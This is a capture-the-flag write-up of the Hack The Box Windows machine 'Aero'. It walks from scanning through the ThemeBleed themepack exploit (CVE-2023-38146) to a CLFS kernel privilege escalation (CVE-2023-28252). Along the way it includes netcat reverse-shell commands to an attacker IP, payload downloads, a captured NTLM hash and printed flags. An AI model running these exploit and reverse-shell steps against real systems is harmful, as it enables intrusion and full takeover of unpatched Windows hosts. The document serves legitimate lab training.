HTB Aero done
Aero
OS:
Windows
Technology:
Windows 11 theme repository
IP Address:
10.10.11.237
Open ports:
80/tcp open http Microsoft IIS httpd 10.0
Users and pass:
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Aero]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.237_nmap 10.10.11.237 ; cat 10.10.11.237_nmap.nmap | grep "tcp.*open"
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-17 14:57 CEST
Nmap scan report for 10.10.11.237
Host is up (0.062s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Aero Theme Hub
|_http-server-header: Microsoft-IIS/10.0
Open website: http://10.10.11.237
We can upload any file with the extension *.theme or *.themepack.
The website doesn't seem to check the file beyond its extension.
We upload a fake file.
File upload succeeded. Once we test your theme it will be added to the site!
ffuf - http://10.10.11.237
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Aero]
└─$ ffuf -u http://10.10.11.237/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.10.11.237_ffuz -of all -e .php,.html,.txt
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.237/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt
:: Output file : 10.10.11.237_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
Home [Status: 200, Size: 11650, Words: 3468, Lines: 187, Duration: 125ms]
favicon.ico [Status: 200, Size: 5430, Words: 9, Lines: 1, Duration: 50ms]
home [Status: 200, Size: 11650, Words: 3468, Lines: 187, Duration: 51ms]
upload [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 56ms]
:: Progress: [81876/81876] :: Job [1/1] :: 655 req/sec :: Duration: [0:02:11] :: Errors: 0 ::
Exploit: CVE-2023-38146 - ThemeBleed (Windows 11 Themes)
https://github.com/Jnnshschl/CVE-2023-38146
Download exploit
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Aero]
└─$ git clone https://github.com/Jnnshschl/CVE-2023-38146.git
Cloning into 'CVE-2023-38146'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 24 (delta 9), reused 21 (delta 6), pack-reused 0
Receiving objects: 100% (24/24), 843.79 KiB | 3.59 MiB/s, done.
Resolving deltas: 100% (9/9), done.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Aero]
└─$ cd CVE-2023-38146
Run exploit
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Aero/CVE-2023-38146]
└─$ python3 themebleed.py -r 10.10.16.7 -p 4711
2024-04-18 09:47:43,067 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2024-04-18 09:47:43,068 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive
2024-04-18 09:47:48,248 INFO> Compiled DLL: "./tb/Aero.msstyles_vrf_evil.dll"
2024-04-18 09:47:48,325 INFO> Theme generated: "evil_theme.theme"
2024-04-18 09:47:48,396 INFO> Themepack generated: "evil_theme.themepack"
2024-04-18 09:47:48,399 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 4711
2024-04-18 09:47:48,399 INFO> Starting SMB server: 10.10.16.7:445
2024-04-18 09:47:48,400 INFO> Config file parsed
2024-04-18 09:47:48,401 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2024-04-18 09:47:48,401 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2024-04-18 09:47:48,402 INFO> Config file parsed
2024-04-18 09:47:48,402 INFO> Config file parsed
2024-04-18 09:47:48,785 INFO> Incoming connection (10.10.11.237,55221)
2024-04-18 09:47:49,034 INFO> AUTHENTICATE_MESSAGE (AERO\sam.emerson,AERO)
2024-04-18 09:47:49,034 INFO> User AERO\sam.emerson authenticated successfully
2024-04-18 09:47:49,034 INFO> sam.emerson::AERO:aaaaaaaaaaaaaaaa:ac9d37f88d8612fcb50566bfedbf4335:010100000000000000aafbb46491da0151d9316d0b284cdf000000000100100074004c0048004b006a007500540056000300100074004c0048004b006a00750054005600020010005a005a0049004d005700610059007600040010005a005a0049004d0057006100590076000700080000aafbb46491da01060004000200000008003000300000000000000000000000002000008dfbb525c377aa13c5bce4b1ac50c67621701a362d3b58d464620f9f2ed9257e0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000
2024-04-18 09:47:49,152 INFO> Connecting Share(1:IPC$)
2024-04-18 09:47:49,254 INFO> Connecting Share(2:tb)
2024-04-18 09:47:49,303 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 7]
2024-04-18 09:47:49,544 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 5]
2024-04-18 09:47:51,025 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-04-18 09:47:51,291 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 1]
2024-04-18 09:47:53,961 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-04-18 09:47:54,199 WARNING> Stage 3/3: "Aero.msstyles_vrf.dll" [shareAccess: 5]
2024-04-18 09:47:59,889 INFO> Disconnecting Share(1:IPC$)
---
Upload evil_theme.themepack and evil_theme.themepack via website
http://10.10.11.237/home#upload
File upload succeeded. Once we test your theme it will be added to the site!
---
Start netcat
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Aero]
└─$ rlwrap -cAr nc -lvnp 4711
listening on [any] 4711 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.237] 55222
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
aero\sam.emerson
PS C:\Windows\system32>
Whoami /all - sam.emerson
PS C:\Windows\system32> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================ ==============================================
aero\sam.emerson S-1-5-21-3555993375-1320373569-1431083245-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\system32>
Read flag: user.txt
PS C:\Windows\system32> cd C:\Users
cd C:\Users
PS C:\Users> dir
dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/20/2023 5:15 AM Administrator
d----- 9/18/2023 5:37 PM aerosvc
d----- 9/18/2023 3:31 PM DefaultAppPool
d-r--- 9/18/2023 1:12 PM Public
d----- 9/20/2023 5:08 AM sam.emerson
PS C:\Users> cd sam.emerson\Desktop\
cd sam.emerson\Desktop\
PS C:\Users\sam.emerson\Desktop> dir
dir
Directory: C:\Users\sam.emerson\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/18/2024 12:04 AM 34 user.txt
PS C:\Users\sam.emerson\Desktop> type user.txt
type user.txt
d5eac04885efde38b540afd6a03578dc
PS C:\Users\sam.emerson\Desktop>
Read file: CVE-2023-28252_Summary.pdf
Download file: CVE-2023-28252_Summary.pdf
PS C:\Users\sam.emerson\Desktop> cd ../Documents
cd ../Documents
PS C:\Users\sam.emerson\Documents> dir
dir
Directory: C:\Users\sam.emerson\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/21/2023 9:18 AM 14158 CVE-2023-28252_Summary.pdf
-a---- 9/26/2023 1:06 PM 1113 watchdog.ps1
PS C:\Users\sam.emerson\Documents> [convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))
[convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))
Read file: CVE-2023-28252_Summary.pdf
Copy base64 to file and decode base64
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Aero/CVE-2023-38146]
└─$ cat CVE-2023-28252_Summary.pdf_base64| base64 -d > CVE-2023-28252_Summary.pdf
---
Open pdf file: CVE-2023-28252_Summary.pdf
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Aero/CVE-2023-38146]
└─$ atril CVE-2023-28252_Summary.pdf
Check the list of hotfixes
We see only 7 hotfixes. After reading the article, I see that an important hotfix is missing: KB5025224 --> https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28252
---
PS C:\Users\sam.emerson\Documents> systeminfo
systeminfo
Host Name: AERO
OS Name: Microsoft Windows 11 Pro N
OS Version: 10.0.22000 N/A Build 22000
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: sam.emerson
Registered Organization:
Product ID: 00332-00332-83900-AA094
Original Install Date: 9/18/2023, 12:06:55 PM
System Boot Time: 4/18/2024, 12:03:34 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,589 MB
Virtual Memory: Max Size: 5,503 MB
Virtual Memory: Available: 3,809 MB
Virtual Memory: In Use: 1,694 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\AERO
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB5004342
[02]: KB5010690
[03]: KB5012170
[04]: KB5026038
[05]: KB5026910
[06]: KB5023774
[07]: KB5029782
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.237
[02]: fe80::b964:df46:ab83:46e0
[03]: dead:beef::e805:8e9a:2c0d:371
[04]: dead:beef::ec0d:a2ce:e8f8:f251
[05]: dead:beef::237
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
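The hotfix check above can be automated when auditing saved `systeminfo` output. This is an added example, not code from the write-up or from either exploit repository; the function names and the embedded sample are constructed for illustration. Windows cumulative updates supersede earlier ones, so a KB absent from this list is a lead to confirm against the MSRC advisory, not proof on its own.

```python
import re

# Constructed sample: the relevant part of the systeminfo output shown above,
# flattened the same way (real output indents the "[NN]:" entries).
SAMPLE = """\
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB5004342
[02]: KB5010690
[03]: KB5012170
[04]: KB5026038
[05]: KB5026910
[06]: KB5023774
[07]: KB5029782
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
"""

HEADER = re.compile(r"^\s*Hotfix\(s\):\s*(\d+)\s+Hotfix\(s\) Installed", re.I)
ENTRY = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$", re.I)


def installed_hotfixes(systeminfo_text):
    """Return the KB ids listed under 'Hotfix(s):' only. Processor and NIC
    entries share the '[NN]:' prefix, so collection starts at the hotfix
    header and stops at the first line that is not a KB entry."""
    kbs, declared, in_section = [], None, False
    for line in systeminfo_text.splitlines():
        if not in_section:
            m = HEADER.match(line)
            if m:
                declared, in_section = int(m.group(1)), True
            continue
        m = ENTRY.match(line)
        if not m:
            break
        kbs.append(m.group(1).upper())
    if declared != len(kbs):  # also raised when no header was found (None)
        raise ValueError(f"hotfix header declares {declared}, parsed {len(kbs)}")
    return kbs


def missing_hotfixes(systeminfo_text, required):
    """Required KBs absent from the installed list, in the order given."""
    have = set(installed_hotfixes(systeminfo_text))
    return [kb for kb in required if kb.upper() not in have]
```

Calling `missing_hotfixes(SAMPLE, ["KB5025224"])` returns the KB the write-up identifies as missing.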
Exploit: CVE-2023-28252 Privesc Exploit
https://github.com/duck-sec/CVE-2023-28252-Compiled-exe
Download exploit
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Aero/CVE-2023-38146]
└─$ git clone https://github.com/duck-sec/CVE-2023-28252-Compiled-exe.git
Cloning into 'CVE-2023-28252-Compiled-exe'...
remote: Enumerating objects: 65, done.
remote: Counting objects: 100% (65/65), done.
remote: Compressing objects: 100% (54/54), done.
remote: Total 65 (delta 18), reused 47 (delta 7), pack-reused 0
Receiving objects: 100% (65/65), 7.73 MiB | 5.45 MiB/s, done.
Resolving deltas: 100% (18/18), done.
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Aero/CVE-2023-38146]
└─$ cd CVE-2023-28252-Compiled-exe
┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Aero/CVE-2023-38146/CVE-2023-28252-Compiled-exe]
└─$ ls
clfs_eop clfs_eop.sln exploit.exe LICENSE README.md x64
Upload exploit to remote host
┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Aero/CVE-2023-38146/CVE-2023-28252-Compiled-exe]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.237 - - [18/Apr/2024 11:32:22] "GET /exploit.exe HTTP/1.1" 200 -
10.10.11.237 - - [18/Apr/2024 11:35:41] "GET /nc64.exe HTTP/1.1" 200 -
---
PS C:\Users\sam.emerson\Documents> iwr http://10.10.16.7/exploit.exe -outfile clfs_eop.exe
iwr http://10.10.16.7/exploit.exe -outfile clfs_eop.exe
PS C:\Users\sam.emerson\Documents> iwr http://10.10.16.7/nc64.exe -outfile nc64.exe
iwr http://10.10.16.7/nc64.exe -outfile nc64.exe
PS C:\Users\sam.emerson\Documents>
Run exploit
┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Aero/CVE-2023-38146/CVE-2023-28252-Compiled-exe]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.237] 55226
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.
C:\Users\sam.emerson\Documents>whoami
whoami
nt authority\system
---
PS C:\Users\sam.emerson\Documents> .\clfs_eop.exe 1208 1 ".\nc64.exe 10.10.16.7 443 -e cmd"
.\clfs_eop.exe 1208 1 ".\nc64.exe 10.10.16.7 443 -e cmd"
Executing command: .\nc64.exe 10.10.16.7 443 -e cmd
ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1
VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FFBDC6A4240
[+] pool NpAt VirtualAddress -->FFFF960FCC4DF000
[+] MY EPROCESSS FFFFA8022B58B0C0
[+] SYSTEM EPROCESSS FFFFA8022709C040
[+] _ETHREAD ADDRESS FFFFA802271BE080
[+] PREVIOUS MODE ADDRESS FFFFA802271BE2B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF807240A3220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF807240BBFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80726543010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF80726BC87B0
[+] Kernel PoFxProcessorNotification --------------------------> FFFFF807265DBD00
PATHS
[+] Folder Public Path = C:\Users\Public
[+] Base log file name path= LOG:C:\Users\Public\19
[+] Base file path = C:\Users\Public\19.blf
[+] Container file name path = C:\Users\Public\.p_19
Last kernel CLFS address = FFFF960FC84A6000
numero de tags CLFS founded 9
Last kernel CLFS address = FFFF960FCF03D000
numero de tags CLFS founded 1
[+] Log file handle: 0000000000000104
[+] Pool CLFS kernel address: FFFF960FCF03D000
number of pipes created =5000
number of pipes created =4000
TRIGGER START
System_token_value: FFFF960FC7241597
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM
Read flag: root.txt
C:\Users\sam.emerson\Documents>type C:\Users\Administrator\Desktop\
type C:\Users\Administrator\Desktop\
The system cannot find the path specified.
C:\Users\sam.emerson\Documents>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
a61d0f2aea7019bbf5bb9106e6d1676c
References
[CVE-2023-38146 - ThemeBleed (Windows 11 Themes)](https://github.com/Jnnshschl/CVE-2023-38146)
[CVE-2023-28252 Privesc Exploit - compiled exe](https://github.com/duck-sec/CVE-2023-28252-Compiled-exe)
[CVE-2023-28252 Privesc Exploit (details)](https://github.com/fortra/CVE-2023-28252)
Lessons Learned